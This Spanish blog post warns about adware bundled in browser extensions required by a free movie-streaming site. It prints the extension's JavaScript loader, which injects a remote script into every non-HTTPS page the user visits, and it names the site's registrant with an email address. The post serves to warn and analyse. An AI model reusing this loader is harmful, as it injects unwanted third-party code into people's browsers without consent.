Plugins (para ver peliculas online) o extensiones oficiales que contienen Adware o Malware
Hay algo que todos debemos entender y hasta mi abuela lo dice “nada es gratis en esta vida”, lo de <Ver Online> esta de moda y con eso el ingenio de muchos para sacar unos cuantos dolares a costa de todo.

Cada vez son mas los sitios que te piden instalar los famosos plugins o extensiones oficiales para poder disfrutar de tu película o serie favorita online. Si decides no hacerlo pues simplemente no podrás ver nada.

Extrañamente en esos sitios NO hay publicidad y la pregunta del millón es ¿cual es su ganancia? (porque la deben tener). Tratando de responder esta pregunta me encontré con cosas muy interesantes. .

La mayoría de esos plugins incluye Adware (Malware cuyo objetivo es mostrar publicidad o remplazar la existente en sitios que visitas) ¡Aja, entonces esto lo explica todo! pero claro, solo decirlo no vale nada, veamos un ejemplo de investigación:

§  Sitio: http://www.Ver-Pelis.net


§  Alexa: Es el sitio #5,311 a nivel mundial según alexa y el #355 en México. (no se trata de un sitio cualquiera, es un TOP)


§  Propietario: El sitio parece estar registrado a un tal “Jorge” de Colombia y su hosting es Dattatec, su email:xpiral@gmail.com


§  CMS: WordPress


§  Plugins: El plugin es obligatorio para reproducir las peliculas o series y esta disponible tanto para Firefox, Chrome o Internet Explorer.


Ya vimos que “Ver-Pelis.net” NO es un sitio mas para ver películas o series online, se trata de uno de los sitios mas visitados a nivel mundial. Y es lamentable que use técnicas como el malware para obtener aun mas ingresos, digo esto pues como si fuera poco, usan publicidad también en su sitio web.
Hasta el momento no he “probado” nada, así que examinemos el codigo del plugin y veamos la implementación del adware:

Primero descargamos un plugin, yo bajare el de Google Chrome, lo voy a descargar pero NO instalar. Usare Firefox para eso. Una vez descargado veremos que se llama “vpstream30.crx” es un .crx (como todo plugin o extension de Chrome) ¿como lo abrimos? fácil: usamos Winrar. Ya abierto con Winrar veremos 2 archivos uno llamado “gox.js” y otro “manifest.json” el que nos interesa es “gox.js” al abrilo con el bloc de notas veremos lo siguiente:

function loadScript() {
if (‘https:’ == document.location.protocol) {
return false;
}
var s = document.createElement(‘script’);
s.setAttribute(“type”,”text/javascript”);
s.setAttribute(“src”, “http://static.ver-pelis.net/player/ready.js”);
var head = (document.getElementsByTagName(‘head’)[0] || document.getElementsByTagName(‘body’)[0]);
if (head!=null) {
head.appendChild(s);
}
}
loadScript();

Podemos leer que lo único que hace el plugin es llamar un script que se encuentra en el mismo sitio de “Ver-Pelis” el archivo se llama “ready.js”  y podemos acceder a el desde este enlace:
http://static.ver-pelis.net/player/ready.js

Ahora abramos ese archivo llamado “ready.js” y miren lo que nos encontramos:

No hay que ser genios para leer lo que el archivo (que ellos mismos alojan) dice.

A continuación un ejemplo de como ve Google alguien que ha sido “infectado” o tiene instalado el plugin de este sitio y es importante mencionar, que NO importa el sistema operativo que usen (puede ser Windows, Linux o Mac) ya que lo que se ve afectado es su navegador, cualquier puede ser victima:

¿Desde cuando Google muestra publicidad en su pagina principal? y peor aun ¿desde cuando muestra publicidad de ese tipo?

Están advertidos, Internet es genial, hasta que nos encontramos con cosas como estas. Lo mejor que podemos hacer es advertirles y que ustedes adviertan a sus conocidos y amigos. Cosas como esta no pasan solamente con este sitio de ejemplo, ocurren en muchos otros similares.  Les recomiendo vayan al administrador de extensiones de su navegador y vean lo que tienen instalado.

Un programa de clase adware es cualquier programa que automáticamente se ejecuta, muestra o baja publicidad web al computador después de instalar el programa o mientras se está utilizando la aplicación. 'Ad' en la palabra 'adware' se refiere a 'advertisement' (anuncios) en inglés.

Malware (del inglés malicious software), también llamado badware, código maligno, software maliciosoo software malintencionado, es un tipo de software que tiene como objetivo infiltrarse o dañar una computadora sin el consentimiento de su propietario. El término malware es muy utilizado por profesionales de la informática para referirse a una variedad de software hostil, intrusivo o molesto


Comments